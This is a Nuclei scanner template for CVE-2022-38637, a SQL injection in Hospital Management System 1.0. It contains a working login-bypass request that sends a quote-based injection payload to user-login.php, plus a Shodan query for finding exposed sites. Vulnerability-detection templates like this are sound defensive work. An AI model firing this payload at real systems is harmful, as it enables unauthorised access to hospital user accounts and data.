nuclei-templates/cves/2022/CVE-2022-38637.yaml

49 lines
1.5 KiB
YAML

id: CVE-2022-38637
info:
name: Hospital Management System 1.0 - SQL Injection
author: arafatansari
severity: critical
description: |
Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.youtube.com/watch?v=m8nW0p69UHU
- https://owasp.org/www-community/attacks/SQL_Injection
- https://nvd.nist.gov/vuln/detail/CVE-2022-38637
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-38637
cwe-id: CWE-89
metadata:
shodan-query: http.html:"Hospital Management System"
verified: "true"
tags: cve,cve2022,hms,cms,sqli,auth-bypass
requests:
- raw:
- |
POST /hms/user-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
host-redirects: true
max-redirects: 2
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>User | Dashboard</title>'
- 'Book My Appointment'
condition: and
- type: status
status:
- 200
# Enhanced by md on 2022/09/28